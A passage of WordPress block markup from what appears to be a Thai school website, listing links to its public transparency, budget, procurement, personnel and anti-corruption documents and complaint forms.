900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 